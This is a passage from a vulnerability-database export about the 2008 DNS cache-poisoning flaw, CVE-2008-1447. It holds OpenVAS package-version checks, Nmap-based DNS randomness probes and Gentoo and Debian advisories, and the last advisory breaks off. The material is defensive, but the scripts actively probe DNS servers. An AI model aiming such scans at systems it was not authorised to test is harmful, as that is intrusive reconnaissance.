rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", patch_list:['PHNE_37865'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS2-RUN\", patch_list:['PHNE_37865'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", revision:\"9.2.0\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"BindUpgrade.BIND-UPGRADE\", revision:\"C.9.3.2.3.0\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"BINDv920.INETSVCS-BIND\", revision:\"B.11.11.01.011\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-07-21T19:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can\nmake a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see references). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the porttest server. In addition\nyour IP address will be sent along with the porttest query to the DNS server running on the target.", "modified": "2020-07-07T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:1361412562310104103", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310104103", "type": "openvas", "title": "Nmap NSE net: dns-random-srcport", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script:\n# Script: Brandon Enright <bmenrigh@ucsd.edu>\n# porttest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n#\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.104103\");\n script_version(\"2020-07-07T13:54:18+0000\");\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_tag(name:\"last_modification\", value:\"2020-07-07 13:54:18 +0000 (Tue, 07 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Nmap NSE net: dns-random-srcport\");\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2011 NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n\n script_xref(name:\"URL\", value:\"https://www.dns-oarc.net/oarc/services/porttest\");\n\n script_tag(name:\"summary\", value:\"Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can\nmake a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see references). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the porttest server. In addition\nyour IP address will be sent along with the porttest query to the DNS server running on the target.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-09-18T11:20:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values\ncan make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see https://www.dns-\noarc.net/oarc/services/txidtest). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition\nyour IP address will be sent along with the txidtest query to the DNS server running on the target.", "modified": "2017-09-15T00:00:00", "published": "2013-02-28T00:00:00", "id": "OPENVAS:803552", "href": "http://plugins.openvas.org/nasl.php?oid=803552", "type": "openvas", "title": "Nmap NSE 6.01: dns-random-txid", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap6_dns_random_txid.nasl 7148 2017-09-15 13:01:14Z cfischer $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: \n# Script: Brandon Enright <bmenrigh@ucsd.edu>\\n\n# txidtest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n# \n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values\ncan make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see https://www.dns-\noarc.net/oarc/services/txidtest). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition\nyour IP address will be sent along with the txidtest query to the DNS server running on the target.\";\n\nif(description)\n{\n script_id(803552);\n script_version(\"$Revision: 7148 $\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-15 15:01:14 +0200 (Fri, 15 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-28 19:00:41 +0530 (Thu, 28 Feb 2013)\");\n script_name(\"Nmap NSE 6.01: dns-random-txid\");\n\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE\");\n\n\n\n script_dependencies(\"toolcheck.nasl\");\n script_mandatory_keys(\"Tools/Present/nmap6.01\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse\");\n\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n# The corresponding NSE script doesn't belong to the 'safe' category\nif (safe_checks()) exit(0);\n\n## DNS Port\nport = 53;\nif(! get_udp_port_state(port)){\n exit(0);\n}\n\nargv = make_list(\"nmap\", \"-sU\", \"--script=dns-random-txid.nse\",\n \"-p\", port, get_host_ip());\n\n## Run nmap and Get the Result\nres = pread(cmd: \"nmap\", argv: argv);\n\nif(res)\n{\n foreach line (split(res))\n {\n if(ereg(pattern:\"^\\|\",string:line)) {\n result += substr(chomp(line),2) + '\\n';\n }\n\n error = eregmatch(string:line, pattern:\"^nmap: (.*)$\");\n if (error) {\n msg = string('Nmap command failed with following error message:\\n', line);\n log_message(data : msg, port:port);\n }\n }\n\n if(\"dns-random-txid\" >< result) {\n msg = string('Result found by Nmap Security Scanner (dns-random-txid.nse) ',\n 'http://nmap.org:\\n\\n', result);\n security_message(data : msg, port:port);\n }\n}\nelse\n{\n msg = string('Nmap command failed entirely:\\n', 'nmap ', argv);\n log_message(data: msg, port:port);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Check for the Version of bind", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880259", "href": "http://plugins.openvas.org/nasl.php?oid=880259", "type": "openvas", "title": "CentOS Update for bind CESA-2008:0533 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2008:0533 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols.\n\n The DNS protocol protects against spoofing attacks by requiring an attacker\n to predict both the DNS transaction ID and UDP source port of a request. In\n recent years, a number of papers have found problems with DNS\n implementations which make it easier for an attacker to perform DNS\n cache-poisoning attacks.\n \n Previous versions of BIND did not use randomized UDP source ports. If an\n attacker was able to predict the random DNS transaction ID, this could make\n DNS cache-poisoning attacks easier. In order to provide more resilience,\n BIND has been updated to use a range of random UDP source ports.\n (CVE-2008-1447)\n \n Note: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\n and 5 to allow BIND to use random UDP source ports.\n \n Users of BIND are advised to upgrade to these updated packages, which\n contain a backported patch to add this functionality.\n \n Red Hat would like to thank Dan Kaminsky for reporting this issue.\";\n\ntag_affected = \"bind on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-July/015081.html\");\n script_id(880259);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"CESA\", value: \"2008:0533\");\n script_cve_id(\"CVE-2008-1447\");\n script_name( \"CentOS Update for bind CESA-2008:0533 centos4 x86_64\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.2.4~28.0.1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.2.4~28.0.1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.2.4~28.0.1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.2.4~28.0.1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.2.4~28.0.1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"selinux-policy-targeted\", rpm:\"selinux-policy-targeted~1.17.30~2.150.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"selinux-policy-targeted-sources\", rpm:\"selinux-policy-targeted-sources~1.17.30~2.150.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:13:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can\nmake a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see https://www.dns-\noarc.net/oarc/services/porttest). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the porttest server. In addition\nyour IP address will be sent along with the porttest query to the DNS server running on the target.", "modified": "2017-03-06T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:104103", "href": "http://plugins.openvas.org/nasl.php?oid=104103", "type": "openvas", "title": "Nmap NSE net: dns-random-srcport", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_dns_random_srcport_net.nasl 5499 2017-03-06 13:06:09Z teissa $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: \n# Script: Brandon Enright <bmenrigh@ucsd.edu>\n# porttest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n#\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can\nmake a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see https://www.dns-\noarc.net/oarc/services/porttest). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the porttest server. In addition\nyour IP address will be sent along with the porttest query to the DNS server running on the target.\";\n\nif(description)\n{\n script_id(104103);\n script_version(\"$Revision: 5499 $\");\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-06 14:06:09 +0100 (Mon, 06 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Nmap NSE net: dns-random-srcport\");\n\n\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n script_dependencies(\"nmap_nse_net.nasl\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse_net\");\n\n\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"nmap.inc\");\n\n# The corresponding NSE script does't belong to the 'safe' category\nif (safe_checks()) exit(0);\n\nphase = 0;\nif (defined_func(\"scan_phase\")) {\n phase = scan_phase();\n}\n\nif (phase == 1) {\n # Get the preferences\n argv = make_array();\n\n\n nmap_nse_register(script:\"dns-random-srcport\", args:argv);\n} else if (phase == 2) {\n res = nmap_nse_get_results(script:\"dns-random-srcport\");\n foreach portspec (keys(res)) {\n output_banner = 'Result found by Nmap Security Scanner (dns-random-srcport.nse) http://nmap.org:\\n\\n';\n if (portspec == \"0\") {\n security_message(data:output_banner + res[portspec], port:0);\n } else {\n v = split(portspec, sep:\"/\", keep:0);\n proto = v[0];\n port = v[1];\n security_message(data:output_banner + res[portspec], port:port, protocol:proto);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-24T12:49:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "The remote host is missing an update to bind9\nannounced via advisory DSA 1603-1.", "modified": "2017-07-07T00:00:00", "published": "2008-07-15T00:00:00", "id": "OPENVAS:61249", "href": "http://plugins.openvas.org/nasl.php?oid=61249", "type": "openvas", "title": "Debian Security Advisory DSA 1603-1 (bind9)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1603_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1603-1 (bind9)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Dan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThis update changes Debian's BIND 9 packages to implement the\nrecommended countermeasure: UDP query source port randomization. This\nchange increases the size of the space from which an attacker has to\nguess values in a backwards-compatible fashion and makes successful\nattacks significantly more difficult.\n\nFor more details on the impact of this update and steps to\ntake to ensure a smooth upgrade, please visit the referenced\nsecurity advisory.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 9.3.4-2etch3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your bind9 package.\";\ntag_summary = \"The remote host is missing an update to bind9\nannounced via advisory DSA 1603-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201603-1\";\n\n\nif(description)\n{\n script_id(61249);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-07-15 02:29:31 +0200 (Tue, 15 Jul 2008)\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Debian Security Advisory DSA 1603-1 (bind9)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"bind9-doc\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccc0\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind-dev\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lwresd\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccfg1\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisc11\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind9-0\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdns22\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblwres9\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9-host\", ver:\"9.3.4-2etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447", "CVE-2008-3350"], "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 200809-02\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: Normal\r\n Title: dnsmasq: Denial of Service and DNS spoofing\r\n Date: September 04, 2008\r\n Bugs: #231282, #232523\r\n ID: 200809-02\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nTwo vulnerabilities in dnsmasq might allow for a Denial of Service or\r\nspoofing of DNS replies.\r\n\r\nBackground\r\n==========\r\n\r\nDnsmasq is a lightweight and easily-configurable DNS forwarder and DHCP\r\nserver.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 net-dns/dnsmasq < 2.45 >= 2.45\r\n\r\nDescription\r\n===========\r\n\r\n* Dan Kaminsky of IOActive reported that dnsmasq does not randomize\r\n UDP source ports when forwarding DNS queries to a recursing DNS\r\n server (CVE-2008-1447).\r\n\r\n* Carlos Carvalho reported that dnsmasq in the 2.43 version does not\r\n properly handle clients sending inform or renewal queries for unknown\r\n DHCP leases, leading to a crash (CVE-2008-3350).\r\n\r\nImpact\r\n======\r\n\r\nA remote attacker could send spoofed DNS response traffic to dnsmasq,\r\npossibly involving generating queries via multiple vectors, and spoof\r\nDNS replies, which could e.g. lead to the redirection of web or mail\r\ntraffic to malicious sites. Furthermore, an attacker could generate\r\ninvalid DHCP traffic and cause a Denial of Service.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround at this time.\r\n\r\nResolution\r\n==========\r\n\r\nAll dnsmasq users should upgrade to the latest version:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot --verbose ">=net-dns/dnsmasq-2.45"\r\n\r\nReferences\r\n==========\r\n\r\n [ 1 ] CVE-2008-3350\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3350\r\n [ 2 ] CVE-2008-1447\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-200809-02.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users machines is of utmost\r\nimportance to us. Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttp://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2008 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner(s).\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/2.5", "edition": 1, "modified": "2008-09-07T00:00:00", "published": "2008-09-07T00:00:00", "id": "SECURITYVULNS:DOC:20475", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20475", "title": "[ GLSA 200809-02 ] dnsmasq: Denial of Service and DNS spoofing", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1619-1 security@debian.org\r\nhttp://www.debian.org/security/ Devin Carraway\r\nJuly 27, 2008 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : python-dns\r\nVulnerability : DNS response spoofing\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2008-1447\r\nDebian Bug : 490217\r\n\r\nMultiple weaknesses have been identified in PyDNS, a DNS client\r\nimplementation for the Python language. Dan Kaminsky identified a\r\npractical vector of DNS response spoofing and cache poisoning,\r\nexploiting the limited entropy in a DNS transaction ID and lack of\r\nUDP source port randomization in many DNS implementations. Scott\r\nKitterman noted that python-dns is vulnerable to this predictability,\r\nas it randomizes neither its transaction ID nor its source port.\r\nTaken together, this lack of entropy leaves applications using\r\npython-dns to perform DNS queries highly susceptible to response\r\nforgery.\r\n\r\nThe Common Vulnerabilities and Exposures project identifies this\r\nclass of weakness as CVE-2008-1447.\r\n\r\nFor the stable distribution (etch), these problems have been fixed in\r\nversion 2.3.0-5.2+etch1.\r\n\r\nWe recommend that you upgrade your python-dns package.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nDebian (stable)\r\n- ---------------\r\n\r\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n 